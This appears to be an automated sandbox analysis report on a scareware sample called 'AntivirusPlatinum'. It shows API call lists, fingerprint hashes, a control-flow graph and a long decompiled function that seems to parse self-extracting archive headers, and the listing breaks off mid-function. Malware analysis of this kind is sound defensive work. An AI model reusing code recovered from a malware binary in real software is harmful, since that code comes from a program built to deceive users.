                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040cb66
                                                                                                                                                              0x0040cb5c
                                                                                                                                                              0x0040cb5d
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040cb64
                                                                                                                                                              0x0040cb6d
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040cb6d
                                                                                                                                                              0x00000000

                                                                                                                                                              APIs
                                                                                                                                                              • SendMessageA.USER32(?,00000080,00000001,003D02D3), ref: 0040CB8C
                                                                                                                                                              • SendDlgItemMessageA.USER32(?,00000066,00000172,00000000,72050A15), ref: 0040CBA1
                                                                                                                                                              • GetDlgItem.USER32 ref: 0040CBB0
                                                                                                                                                              • SendMessageA.USER32(00000000,00000435,00000000,00010000), ref: 0040CBC5
                                                                                                                                                              • GetSysColor.USER32(0000000F), ref: 0040CBC9
                                                                                                                                                              • SendMessageA.USER32(00000000,00000443,00000000,00000000), ref: 0040CBD8
                                                                                                                                                              • EndDialog.USER32(?,00000001), ref: 0040CC15
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.395273488.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.395260573.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395507388.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395572641.0000000000414000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395770810.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395824576.0000000000421000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: MessageSend$Item$ColorDialog
                                                                                                                                                              • String ID: LICENSEDLG
                                                                                                                                                              • API String ID: 1567230415-2177901306
                                                                                                                                                              • Opcode ID: 01760e1f4c38ce4e5e33aba2a4cd8c6bda376a24c8dc7a6e2c1aa10115963a11
                                                                                                                                                              • Instruction ID: 32aadb3c41ccaf98f700fdda87381be768b7f3295c14a38e3d64121b63e1e91d
                                                                                                                                                              • Opcode Fuzzy Hash: 01760e1f4c38ce4e5e33aba2a4cd8c6bda376a24c8dc7a6e2c1aa10115963a11
                                                                                                                                                              • Instruction Fuzzy Hash: CC21B071240209BEE6116F61EDC6FBB376DE745B84F008036FB01F50E0C6B99C61966D
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 990 401ce5-401d18 call 401200 call 404fdc call 408eac 997 401d72-401d76 990->997 998 401d1a-401d2f 990->998 999 401de3-401de8 call 408d14 997->999 998->997 1000 401d31 998->1000 1004 401ded-401df1 999->1004 1002 401d33-401d3b 1000->1002 1003 401d3d-401d54 call 40568a 1000->1003 1002->997 1002->1003 1007 401d56-401d58 call 401b80 1003->1007 1009 401d78-401d86 1003->1009 1004->1007 1008 401df7-401e41 call 408dc6 call 408da4 call 408dc6 * 2 1004->1008 1012 401d5d 1007->1012 1035 401e43-401e6f call 4098f7 call 40b2a9 call 40325c 1008->1035 1036 401e74-401e7d 1008->1036 1014 401db3-401de0 call 402dbd 1009->1014 1015 401d88-401d9b call 402c96 1009->1015 1017 401d61 1012->1017 1014->999 1015->1014 1028 401d9d-401dae call 404f2e call 40343e 1015->1028 1021 401d63-401d66 call 40a205 1017->1021 1022 401d6b-401d6d 1017->1022 1021->1022 1026 40250c-402510 1022->1026 1028->1014 1035->1012 1038 401e83-401e86 1036->1038 1039 401e7f-401e81 1036->1039 1042 401e88-401e8b 1038->1042 1043 401e8d-401e93 1038->1043 1041 401e94-401ec3 call 408d14 1039->1041 1049 4023a1-4023da call 408dc6 call 408e05 1041->1049 1050 401ec9-401eca 1041->1050 1042->1039 1042->1043 1043->1041 1065 4023eb-40240f call 408e82 1049->1065 1074 4023dc-4023e6 call 408da4 1049->1074 1051 401f49-401f52 1050->1051 1052 401ecc-401ecf 1050->1052 1057 401f54 1051->1057 1058 401f5a-401fef call 408e05 * 2 call 408da4 call 408e05 * 2 call 408da4 * 2 call 408dc6 call 408e05 1051->1058 1052->1051 1055 401ed1-401ed2 1052->1055 1060 401f03-401f1b 1055->1060 1061 401ed4-401edc 1055->1061 1057->1058 1131 401ff1-402009 call 408e05 * 2 1058->1131 1132 40200b-40201d 1058->1132 1066 401f2c-401f2f 1060->1066 1067 401f1d-401f27 call 408e05 1060->1067 1064 401ee2-401efe call 408e05 1061->1064 1061->1065 1064->1065 1081 4024c1-4024cd 1065->1081 1082 402415-402431 1065->1082 1066->1065 1073 401f35-401f44 call 408dc6 1066->1073 1067->1066 1073->1065 1074->1065 1084 4024fa-402500 1081->1084 1085 4024cf 1081->1085 1082->1081 1087 402437-40243a 1082->1087 1093 402502-402505 call 40a205 1084->1093 1094 40250a 1084->1094 1088 4024d1-4024dd 1085->1088 1089 4024df-4024f8 call 4098f7 call 40b2a9 1085->1089 1091 40248a-4024a1 call 4098f7 call 40b2a9 call 404f2e 1087->1091 1092 40243c-402443 1087->1092 1088->1084 1088->1089 1112 4024a6-4024bc call 40325c 1089->1112 1091->1112 1092->1091 1098 402445-402466 call 40a7e9 call 404fdc call 4054ed 1092->1098 1093->1094 1094->1026 1123 40246a-402473 call 40574f 1098->1123 1112->1017 1129 402475 1123->1129 1130 402479-40247a 1123->1130 1129->1130 1130->1123 1133 40247c-402488 call 40a810 1130->1133 1136 402028-40207f call 401030 * 2 1131->1136 1132->1136 1137 40201f-402026 1132->1137 1133->1081 1133->1091 1146 402081 1136->1146 1147 402084-4020ba call 408e4a call 40db30 1136->1147 1137->1136 1146->1147 1152 4020c0-4020d8 1147->1152 1153 402147-40214a 1147->1153 1156 4020da 1152->1156 1157 4020dd-4020df 1152->1157 1154 402150-402159 1153->1154 1155 4021f2-4021fb 1153->1155 1158 4021e2-4021e4 1154->1158 1159 40215f-402181 call 4030db call 40a384 1154->1159 1160 4021fd-402209 call 408e4a 1155->1160 1161 40220e-40223b call 40def9 1155->1161 1156->1157 1157->1155 1162 4020e5-40210f call 401708 call 408e4a call 40a4e9 1157->1162 1163 4021eb-4021ed call 401c42 1158->1163 1180 4021b0-4021cc call 4030ec 1159->1180 1181 402183-4021ae call 40e1db call 40e115 CharToOemA 1159->1181 1160->1161 1173 402241-402274 call 408dc6 1161->1173 1174 402319-402353 call 408e82 1161->1174 1162->1155 1194 402115-402142 1162->1194 1163->1155 1186 40227b-402290 1173->1186 1174->1065 1189 402359-402360 1174->1189 1193 4021d1-4021d5 1180->1193 1181->1193 1191 402292-402296 1186->1191 1192 402308-402313 1186->1192 1195 402362-40236a call 40a5e2 1189->1195 1196 40236f-40239f call 40325c call 40dba8 call 4098f7 call 40b2a9 1189->1196 1200 4022b1-4022c2 1191->1200 1201 402298-4022ae call 408e05 call 40def9 1191->1201 1192->1174 1192->1186 1193->1163 1202 4021d7-4021e0 1193->1202 1194->1155 1195->1196 1196->1065 1204 4022c4 1200->1204 1205 4022c7-4022d0 1200->1205 1201->1200 1202->1163 1204->1205 1209 4022d2-4022d7 1205->1209 1210 4022f6-402305 1205->1210 1214 4022d9-4022f4 call 408da4 1209->1214 1210->1192 1214->1210
                                                                                                                                                              C-Code - Quality: 86%
                                                                                                                                                              			E00401CE5(void* __ecx, signed int __edx, void* __eflags) {
                                                                                                                                                              				char _v5;
                                                                                                                                                              				signed int _v12;
                                                                                                                                                              				CHAR* _v16;
                                                                                                                                                              				signed int _v20;
                                                                                                                                                              				intOrPtr* _v24;
                                                                                                                                                              				signed char _v25;
                                                                                                                                                              				signed char _v26;
                                                                                                                                                              				intOrPtr _v32;
                                                                                                                                                              				signed int _v40;
                                                                                                                                                              				intOrPtr _v52;
                                                                                                                                                              				signed int _v56;
                                                                                                                                                              				char _v60;
                                                                                                                                                              				signed short _v64;
                                                                                                                                                              				signed char _v68;
                                                                                                                                                              				intOrPtr _v72;
                                                                                                                                                              				intOrPtr _v76;
                                                                                                                                                              				intOrPtr _v80;
                                                                                                                                                              				intOrPtr _v84;
                                                                                                                                                              				char _v88;
                                                                                                                                                              				char _v92;
                                                                                                                                                              				signed int _v104;
                                                                                                                                                              				char _v108;
                                                                                                                                                              				void _v128;
                                                                                                                                                              				char _v4224;
                                                                                                                                                              				void* __ebx;
                                                                                                                                                              				void* __ebp;
                                                                                                                                                              				intOrPtr _t269;
                                                                                                                                                              				signed int _t282;
                                                                                                                                                              				signed int _t284;
                                                                                                                                                              				signed int _t288;
                                                                                                                                                              				signed int _t294;
                                                                                                                                                              				signed int _t295;
                                                                                                                                                              				void* _t308;
                                                                                                                                                              				signed int _t309;
                                                                                                                                                              				signed int _t311;
                                                                                                                                                              				intOrPtr* _t315;
                                                                                                                                                              				signed int* _t335;
                                                                                                                                                              				signed short _t342;
                                                                                                                                                              				intOrPtr _t347;
                                                                                                                                                              				signed int _t358;
                                                                                                                                                              				intOrPtr _t359;
                                                                                                                                                              				void* _t361;
                                                                                                                                                              				signed char _t374;
                                                                                                                                                              				signed int _t375;
                                                                                                                                                              				signed int _t376;
                                                                                                                                                              				signed int _t382;
                                                                                                                                                              				void* _t394;
                                                                                                                                                              				signed int _t409;
                                                                                                                                                              				void* _t429;
                                                                                                                                                              				signed int _t432;
                                                                                                                                                              				void* _t440;
                                                                                                                                                              				signed short _t449;
                                                                                                                                                              				signed int _t452;
                                                                                                                                                              				signed int _t456;
                                                                                                                                                              				signed int _t465;
                                                                                                                                                              				signed int* _t475;
                                                                                                                                                              				signed int _t488;
                                                                                                                                                              				signed int _t490;
                                                                                                                                                              				signed int _t500;
                                                                                                                                                              				signed int _t514;
                                                                                                                                                              				signed int _t526;
                                                                                                                                                              				void* _t529;
                                                                                                                                                              				signed char* _t533;
                                                                                                                                                              				signed int* _t537;
                                                                                                                                                              				signed int _t539;
                                                                                                                                                              				void* _t541;
                                                                                                                                                              				signed int _t548;
                                                                                                                                                              				short* _t549;
                                                                                                                                                              				signed int _t552;
                                                                                                                                                              				signed short* _t555;
                                                                                                                                                              				signed int _t557;
                                                                                                                                                              				signed int _t559;
                                                                                                                                                              				intOrPtr* _t561;
                                                                                                                                                              				signed int _t563;
                                                                                                                                                              				signed int _t566;
                                                                                                                                                              				signed char* _t568;
                                                                                                                                                              				intOrPtr _t569;
                                                                                                                                                              				void* _t570;
                                                                                                                                                              				void* _t571;
                                                                                                                                                              				void* _t574;
                                                                                                                                                              				signed int _t578;
                                                                                                                                                              				signed int _t581;
                                                                                                                                                              
                                                                                                                                                              				_t526 = __edx;
                                                                                                                                                              				E00401200(0x107c);
                                                                                                                                                              				_t440 = __ecx; // executed
                                                                                                                                                              				_t269 = E00404FDC(__ecx, __edx); // executed
                                                                                                                                                              				 *((intOrPtr*)(__ecx + 0x6d78)) = _t269;
                                                                                                                                                              				 *(__ecx + 0x6d7c) = __edx;
                                                                                                                                                              				E00408EAC( &_v56, __ecx);
                                                                                                                                                              				if( *((char*)(__ecx + 0x6d90)) == 0) {
                                                                                                                                                              					L10:
                                                                                                                                                              					_v5 = 0;
                                                                                                                                                              					L15:
                                                                                                                                                              					E00408D14(_t440,  &_v56, 7); // executed
                                                                                                                                                              					__eflags = _v40;
                                                                                                                                                              					if(_v40 == 0) {
                                                                                                                                                              						L5:
                                                                                                                                                              						E00401B80(_t440, _t526);
                                                                                                                                                              						L6:
                                                                                                                                                              						_t581 = _v56;
                                                                                                                                                              						L7:
                                                                                                                                                              						if(_t581 != 0) {
                                                                                                                                                              							E0040A205(_v56);
                                                                                                                                                              						}
                                                                                                                                                              						return 0;
                                                                                                                                                              					}
                                                                                                                                                              					E00408DC6( &_v56, _t440 + 0x4680);
                                                                                                                                                              					E00408DA4( &_v56,  &_v26);
                                                                                                                                                              					_t533 = _t440 + 0x4688;
                                                                                                                                                              					 *(_t440 + 0x4684) = _v26 & 0x000000ff;
                                                                                                                                                              					E00408DC6( &_v56, _t533);
                                                                                                                                                              					_t555 = _t440 + 0x468a;
                                                                                                                                                              					E00408DC6( &_v56, _t555);
                                                                                                                                                              					_t449 =  *_t555 & 0x0000ffff;
                                                                                                                                                              					__eflags = _t449 - 7;
                                                                                                                                                              					if(_t449 >= 7) {
                                                                                                                                                              						_t282 =  *(_t440 + 0x4684);
                                                                                                                                                              						__eflags = _t282 - 0x75;
                                                                                                                                                              						if(_t282 != 0x75) {
                                                                                                                                                              							__eflags = _t282 - 0x73;
                                                                                                                                                              							if(_t282 != 0x73) {
                                                                                                                                                              								L22:
                                                                                                                                                              								_t284 = (_t449 & 0x0000ffff) - 7;
                                                                                                                                                              								__eflags = _t284;
                                                                                                                                                              								_push(_t284);
                                                                                                                                                              								L23:
                                                                                                                                                              								E00408D14(_t440,  &_v56);
                                                                                                                                                              								asm("cdq");
                                                                                                                                                              								asm("adc edx, [ebx+0x6d7c]");
                                                                                                                                                              								 *((intOrPtr*)(_t440 + 0x6d80)) = ( *_t555 & 0x0000ffff) +  *((intOrPtr*)(_t440 + 0x6d78));
                                                                                                                                                              								_t288 =  *(_t440 + 0x4684);
                                                                                                                                                              								_t452 = _t288 - 0x73;
                                                                                                                                                              								__eflags = _t452;
                                                                                                                                                              								 *(_t440 + 0x6d84) = _t526;
                                                                                                                                                              								if(_t452 == 0) {
                                                                                                                                                              									asm("movsd");
                                                                                                                                                              									asm("movsd");
                                                                                                                                                              									asm("movsd");
                                                                                                                                                              									E00408DC6( &_v56, _t440 + 0x4698);
                                                                                                                                                              									E00408E05( &_v56, _t440 + 0x469c);
                                                                                                                                                              									__eflags =  *(_t440 + 0x4694) & 0x00000200;
                                                                                                                                                              									if(( *(_t440 + 0x4694) & 0x00000200) != 0) {
                                                                                                                                                              										E00408DA4( &_v56, _t440 + 0x46a0);
                                                                                                                                                              									}
                                                                                                                                                              									L76:
                                                                                                                                                              									_t294 = E00408E82( &_v56, 0);
                                                                                                                                                              									__eflags = _v5;
                                                                                                                                                              									_t456 =  *(_t440 + 0x4684);
                                                                                                                                                              									_t295 =  !_t294;
                                                                                                                                                              									 *(_t440 + 0x6d9a) = _t295;
                                                                                                                                                              									 *(_t440 + 0x4678) = _t456;
                                                                                                                                                              									if(_v5 == 0) {
                                                                                                                                                              										L87:
                                                                                                                                                              										__eflags =  *(_t440 + 0x6d84) -  *((intOrPtr*)(_t440 + 0x6d7c));
                                                                                                                                                              										if(__eflags > 0) {
                                                                                                                                                              											L91:
                                                                                                                                                              											_t557 = _v40;
                                                                                                                                                              											__eflags = _v56;
                                                                                                                                                              											if(_v56 != 0) {
                                                                                                                                                              												E0040A205(_v56);
                                                                                                                                                              											}
                                                                                                                                                              											return _t557;
                                                                                                                                                              										}
                                                                                                                                                              										if(__eflags < 0) {
                                                                                                                                                              											L90:
                                                                                                                                                              											E0040B2A9(_t440 + 0x17, E004098F7(0x68), "???");
                                                                                                                                                              											L86:
                                                                                                                                                              											 *((char*)(_t440 + 0x6d98)) = 1;
                                                                                                                                                              											E0040325C(0x414c7c, 3);
                                                                                                                                                              											__eflags = _v56;
                                                                                                                                                              											goto L7;
                                                                                                                                                              										}
                                                                                                                                                              										__eflags =  *((intOrPtr*)(_t440 + 0x6d80)) -  *((intOrPtr*)(_t440 + 0x6d78));
                                                                                                                                                              										if( *((intOrPtr*)(_t440 + 0x6d80)) >  *((intOrPtr*)(_t440 + 0x6d78))) {
                                                                                                                                                              											goto L91;
                                                                                                                                                              										}
                                                                                                                                                              										goto L90;
                                                                                                                                                              									}
                                                                                                                                                              									_t529 = _v52 - _v40 + 8;
                                                                                                                                                              									 *((intOrPtr*)(_t440 + 0x6d80)) =  *((intOrPtr*)(_t440 + 0x6d80)) + _t529;
                                                                                                                                                              									asm("adc [ebx+0x6d84], edi");
                                                                                                                                                              									__eflags =  *((intOrPtr*)(_t440 + 0x4680)) - _t295;
                                                                                                                                                              									if( *((intOrPtr*)(_t440 + 0x4680)) == _t295) {
                                                                                                                                                              										goto L87;
                                                                                                                                                              									}
                                                                                                                                                              									__eflags = _t456 - 0x7b;
                                                                                                                                                              									if(_t456 != 0x7b) {
                                                                                                                                                              										L85:
                                                                                                                                                              										E0040B2A9(_t440 + 0x17, E004098F7(0x70), _t440 + 0x17);
                                                                                                                                                              										E00404F2E(_t440);
                                                                                                                                                              										goto L86;
                                                                                                                                                              									}
                                                                                                                                                              									__eflags =  *(_t440 + 0x5398) & 0x00000004;
                                                                                                                                                              									if(( *(_t440 + 0x5398) & 0x00000004) == 0) {
                                                                                                                                                              										goto L85;
                                                                                                                                                              									}
                                                                                                                                                              									E0040A7E9( &_v92, _t529, _t440);
                                                                                                                                                              									_t308 = E00404FDC(_t440, _t529);
                                                                                                                                                              									_push(0);
                                                                                                                                                              									_t559 = 7;
                                                                                                                                                              									_t309 = _t308 - _t559;
                                                                                                                                                              									__eflags = _t309;
                                                                                                                                                              									asm("sbb edx, edi");
                                                                                                                                                              									_push(_t529);
                                                                                                                                                              									_push(_t309);
                                                                                                                                                              									E004054ED(_t440);
                                                                                                                                                              									_v5 = 1;
                                                                                                                                                              									do {
                                                                                                                                                              										_t311 = E0040574F(_t440);
                                                                                                                                                              										__eflags = _t311;
                                                                                                                                                              										if(_t311 != 0) {
                                                                                                                                                              											_v5 = 0;
                                                                                                                                                              										}
                                                                                                                                                              										_t559 = _t559 - 1;
                                                                                                                                                              										__eflags = _t559;
                                                                                                                                                              									} while (_t559 != 0);
                                                                                                                                                              									E0040A810( &_v92);
                                                                                                                                                              									__eflags = _v5;
                                                                                                                                                              									if(_v5 != 0) {
                                                                                                                                                              										goto L87;
                                                                                                                                                              									}
                                                                                                                                                              									goto L85;
                                                                                                                                                              								}
                                                                                                                                                              								_t465 = _t452 - 1;
                                                                                                                                                              								__eflags = _t465;
                                                                                                                                                              								if(_t465 == 0) {
                                                                                                                                                              									L33:
                                                                                                                                                              									__eflags = _t288 - 0x74;
                                                                                                                                                              									_t315 = _t440 + 0x46a8;
                                                                                                                                                              									if(_t288 != 0x74) {
                                                                                                                                                              										_t315 = _t440 + 0x53b8;
                                                                                                                                                              									}
                                                                                                                                                              									asm("movsd");
                                                                                                                                                              									asm("movsd");
                                                                                                                                                              									_v24 = _t315;
                                                                                                                                                              									asm("movsd");
                                                                                                                                                              									_v64 = _t315 + 0xc;
                                                                                                                                                              									E00408E05( &_v56, _t315 + 0xc);
                                                                                                                                                              									_t561 = _v24;
                                                                                                                                                              									_t66 = _t561 + 0x10; // 0x10
                                                                                                                                                              									_v20 = _t66;
                                                                                                                                                              									E00408E05( &_v56, _t66);
                                                                                                                                                              									_t69 = _t561 + 0x14; // 0x14
                                                                                                                                                              									E00408DA4( &_v56, _t69);
                                                                                                                                                              									_t71 = _t561 + 0x18; // 0x18
                                                                                                                                                              									E00408E05( &_v56, _t71);
                                                                                                                                                              									_t73 = _t561 + 0x1c; // 0x1c
                                                                                                                                                              									_v60 = _t73;
                                                                                                                                                              									E00408E05( &_v56, _t73);
                                                                                                                                                              									_t76 = _t561 + 0x20; // 0x20
                                                                                                                                                              									E00408DA4( &_v56, _t76);
                                                                                                                                                              									_t78 = _t561 + 0x21; // 0x21
                                                                                                                                                              									E00408DA4( &_v56, _t78);
                                                                                                                                                              									_t80 = _t561 + 0x22; // 0x22
                                                                                                                                                              									_v12 = _t80;
                                                                                                                                                              									E00408DC6( &_v56, _t80);
                                                                                                                                                              									_t83 = _t561 + 0x24; // 0x24
                                                                                                                                                              									E00408E05( &_v56, _t83);
                                                                                                                                                              									_t85 = _t561 + 0x28; // 0x28
                                                                                                                                                              									_t537 = _t85;
                                                                                                                                                              									__eflags =  *(_t561 + 8) & 0x00000100;
                                                                                                                                                              									if(( *(_t561 + 8) & 0x00000100) == 0) {
                                                                                                                                                              										_t475 = _v20;
                                                                                                                                                              										 *_t537 =  *_t537 & 0x00000000;
                                                                                                                                                              										_t94 = _t561 + 0x2c; // 0x2c
                                                                                                                                                              										_t335 = _t94;
                                                                                                                                                              										 *_t335 =  *_t335 & 0x00000000;
                                                                                                                                                              										__eflags =  *_t475 - 0xffffffff;
                                                                                                                                                              										_v16 = _t335;
                                                                                                                                                              										if( *_t475 == 0xffffffff) {
                                                                                                                                                              											_t526 = 0x7fffffff;
                                                                                                                                                              											 *_t475 = 0x7fffffff;
                                                                                                                                                              											 *_t335 = 0x7fffffff;
                                                                                                                                                              										}
                                                                                                                                                              									} else {
                                                                                                                                                              										E00408E05( &_v56, _t537);
                                                                                                                                                              										_t90 = _t561 + 0x2c; // 0x2c
                                                                                                                                                              										_v16 = _t90;
                                                                                                                                                              										E00408E05( &_v56, _t90);
                                                                                                                                                              									}
                                                                                                                                                              									 *((intOrPtr*)(_t561 + 0xcd8)) = E00401030( *_t537, 0, 0, 1) +  *_v64;
                                                                                                                                                              									asm("adc edx, edi");
                                                                                                                                                              									 *(_t561 + 0xcdc) = _t526;
                                                                                                                                                              									 *((intOrPtr*)(_t561 + 0xce0)) = E00401030( *_v16, 0, 0, 1) +  *_v20;
                                                                                                                                                              									_t342 =  *_v12 & 0x0000ffff;
                                                                                                                                                              									asm("adc edx, edi");
                                                                                                                                                              									_t539 = 0xfff;
                                                                                                                                                              									 *(_t561 + 0xce4) = _t526;
                                                                                                                                                              									__eflags = _t342 - 0xfff;
                                                                                                                                                              									if(_t342 < 0xfff) {
                                                                                                                                                              										_t539 = _t342 & 0x0000ffff;
                                                                                                                                                              									}
                                                                                                                                                              									E00408E4A( &_v56,  &_v4224, _t539);
                                                                                                                                                              									_t107 = _t561 + 0x30; // 0x30
                                                                                                                                                              									 *((char*)(_t570 + _t539 - 0x107c)) = 0;
                                                                                                                                                              									_v16 = _t107;
                                                                                                                                                              									E0040DB30(_t107,  &_v4224, 0x400);
                                                                                                                                                              									_t347 =  *((intOrPtr*)(_t561 + 4));
                                                                                                                                                              									__eflags = _t347 - 0x7a;
                                                                                                                                                              									if(_t347 != 0x7a) {
                                                                                                                                                              										__eflags = _t347 - 0x74;
                                                                                                                                                              										if(_t347 == 0x74) {
                                                                                                                                                              											__eflags =  *(_t561 + 8) & 0x00000200;
                                                                                                                                                              											if(( *(_t561 + 8) & 0x00000200) == 0) {
                                                                                                                                                              												__eflags = 0;
                                                                                                                                                              												 *((short*)(_t561 + 0x430)) = 0;
                                                                                                                                                              											} else {
                                                                                                                                                              												E004030DB( &_v88);
                                                                                                                                                              												_t394 = E0040A384( &_v88,  &_v4224);
                                                                                                                                                              												_t500 =  *_v12 & 0x0000ffff;
                                                                                                                                                              												_t132 = _t561 + 0x430; // 0x430
                                                                                                                                                              												_t549 = _t132;
                                                                                                                                                              												__eflags = _t394 - _t500;
                                                                                                                                                              												if(_t394 != _t500) {
                                                                                                                                                              													__eflags = _t500 - _t394 + 1;
                                                                                                                                                              													E004030EC( &_v88,  &_v4224, _t570 + _t394 + 1 - 0x107c, _t500 - _t394 + 1, _t549, 0x400);
                                                                                                                                                              												} else {
                                                                                                                                                              													E0040E1DB( &_v4224, _t549, 0x3ff);
                                                                                                                                                              													E0040E115(_t500, _t549, _v16, 0x3ff);
                                                                                                                                                              													CharToOemA(_v16, _v16);
                                                                                                                                                              												}
                                                                                                                                                              												__eflags =  *_t549;
                                                                                                                                                              												if( *_t549 == 0) {
                                                                                                                                                              													 *(_t561 + 8) =  *(_t561 + 8) & 0x0000fdff;
                                                                                                                                                              												}
                                                                                                                                                              											}
                                                                                                                                                              											E00401C42(_t440);
                                                                                                                                                              										}
                                                                                                                                                              									} else {
                                                                                                                                                              										_t552 = ( *(_t561 + 0xa) & 0x0000ffff) - ( *_v12 & 0x0000ffff) - 0x20;
                                                                                                                                                              										__eflags =  *(_t561 + 8) & 0x00000400;
                                                                                                                                                              										if(( *(_t561 + 8) & 0x00000400) != 0) {
                                                                                                                                                              											_t552 = _t552 - 8;
                                                                                                                                                              											__eflags = _t552;
                                                                                                                                                              										}
                                                                                                                                                              										__eflags = _t552;
                                                                                                                                                              										if(_t552 > 0) {
                                                                                                                                                              											_t117 = _t561 + 0xc30; // 0xc30
                                                                                                                                                              											E00401708(_t117, _t552);
                                                                                                                                                              											E00408E4A( &_v56,  *((intOrPtr*)(_t561 + 0xc30)), _t552);
                                                                                                                                                              											_t409 = E0040A4E9(_v16, 0x4122cc);
                                                                                                                                                              											__eflags = _t409;
                                                                                                                                                              											if(_t409 == 0) {
                                                                                                                                                              												 *((intOrPtr*)(_t440 + 0x4640)) = (((( *( *((intOrPtr*)(_t561 + 0xc30)) + 0xb) & 0x000000ff) << 8) + ( *( *((intOrPtr*)(_t561 + 0xc30)) + 0xa) & 0x000000ff) << 8) + ( *(_t410 + 9) & 0x000000ff) << 8) + ( *(_t410 + 8) & 0x000000ff);
                                                                                                                                                              											}
                                                                                                                                                              										}
                                                                                                                                                              									}
                                                                                                                                                              									__eflags =  *(_t561 + 8) & 0x00000400;
                                                                                                                                                              									if(( *(_t561 + 8) & 0x00000400) != 0) {
                                                                                                                                                              										_t147 = _t561 + 0xc3c; // 0xc3c
                                                                                                                                                              										E00408E4A( &_v56, _t147, 8);
                                                                                                                                                              									}
                                                                                                                                                              									_t150 = _t561 + 0xc44; // 0xc44
                                                                                                                                                              									E0040DEF9(_t150,  *_v60);
                                                                                                                                                              									 *((intOrPtr*)(_t561 + 0xc68)) = 0;
                                                                                                                                                              									 *((intOrPtr*)(_t561 + 0xc8c)) = 0;
                                                                                                                                                              									 *((intOrPtr*)(_t561 + 0xcb0)) = 0;
                                                                                                                                                              									__eflags =  *(_t561 + 8) & 0x00001000;
                                                                                                                                                              									if(( *(_t561 + 8) & 0x00001000) == 0) {
                                                                                                                                                              										L70:
                                                                                                                                                              										 *((intOrPtr*)(_t440 + 0x6d80)) =  *((intOrPtr*)(_t440 + 0x6d80)) +  *((intOrPtr*)(_t561 + 0xcd8));
                                                                                                                                                              										asm("adc [ebx+0x6d84], eax");
                                                                                                                                                              										_v68 =  *(_t561 + 8) >> 0x00000003 & 0x00000001;
                                                                                                                                                              										_t358 =  !(E00408E82( &_v56, _v68));
                                                                                                                                                              										 *(_t440 + 0x6d9a) = _t358;
                                                                                                                                                              										__eflags =  *_t561 - _t358;
                                                                                                                                                              										if( *_t561 != _t358) {
                                                                                                                                                              											_t359 = _v24;
                                                                                                                                                              											__eflags =  *((intOrPtr*)(_t359 + 4)) - 0x7a;
                                                                                                                                                              											if( *((intOrPtr*)(_t359 + 4)) == 0x7a) {
                                                                                                                                                              												E0040A5E2(_v16, "- ???");
                                                                                                                                                              											}
                                                                                                                                                              											 *((char*)(_t440 + 0x6d98)) = 1;
                                                                                                                                                              											E0040325C(0x414c7c, 1);
                                                                                                                                                              											_t361 = E0040DBA8(_v16);
                                                                                                                                                              											E0040B2A9(_t440 + 0x17, E004098F7(0x68), _t361);
                                                                                                                                                              											_t571 = _t571 + 0xc;
                                                                                                                                                              										}
                                                                                                                                                              										goto L76;
                                                                                                                                                              									} else {
                                                                                                                                                              										E00408DC6( &_v56,  &_v64);
                                                                                                                                                              										_v84 = _t440 + 0x52ec;
                                                                                                                                                              										_v80 = _t440 + 0x5310;
                                                                                                                                                              										_v76 = _t440 + 0x5334;
                                                                                                                                                              										_v72 = _t440 + 0x5358;
                                                                                                                                                              										_v20 = 0;
                                                                                                                                                              										_v12 = 0xc;
                                                                                                                                                              										do {
                                                                                                                                                              											_t541 =  *(_t570 + _v20 * 4 - 0x50);
                                                                                                                                                              											_t374 = (_v64 & 0x0000ffff) >> _v12;
                                                                                                                                                              											_v68 = _t374;
                                                                                                                                                              											__eflags = _t374 & 0x00000008;
                                                                                                                                                              											if((_t374 & 0x00000008) == 0) {
                                                                                                                                                              												goto L69;
                                                                                                                                                              											}
                                                                                                                                                              											__eflags = _v20;
                                                                                                                                                              											if(_v20 != 0) {
                                                                                                                                                              												E00408E05( &_v56,  &_v60);
                                                                                                                                                              												E0040DEF9(_t541, _v60);
                                                                                                                                                              											}
                                                                                                                                                              											_t488 = 9;
                                                                                                                                                              											_t375 = memcpy( &_v128,  *(_t570 + _v20 * 4 - 0x50), _t488 << 2);
                                                                                                                                                              											_t574 = _t571 + 0xc;
                                                                                                                                                              											__eflags = _t375 & 0x00000004;
                                                                                                                                                              											if((_t375 & 0x00000004) != 0) {
                                                                                                                                                              												_t191 =  &_v108;
                                                                                                                                                              												 *_t191 = _v108 + 1;
                                                                                                                                                              												__eflags =  *_t191;
                                                                                                                                                              											}
                                                                                                                                                              											_v104 = _v104 & 0x00000000;
                                                                                                                                                              											_t563 = 3;
                                                                                                                                                              											_t376 = _t375 & _t563;
                                                                                                                                                              											__eflags = _t376;
                                                                                                                                                              											if(_t376 <= 0) {
                                                                                                                                                              												L68:
                                                                                                                                                              												_t490 = 9;
                                                                                                                                                              												memcpy( *(_t570 + _v20 * 4 - 0x50),  &_v128, _t490 << 2);
                                                                                                                                                              												_t571 = _t574 + 0xc;
                                                                                                                                                              												_t561 = _v24;
                                                                                                                                                              											} else {
                                                                                                                                                              												_t566 = _t563 - _t376 << 3;
                                                                                                                                                              												__eflags = _t566;
                                                                                                                                                              												_t548 = _t376;
                                                                                                                                                              												do {
                                                                                                                                                              													E00408DA4( &_v56,  &_v25);
                                                                                                                                                              													_t382 = (_v25 & 0x000000ff) << _t566;
                                                                                                                                                              													_t566 = _t566 + 8;
                                                                                                                                                              													_v104 = _v104 | _t382;
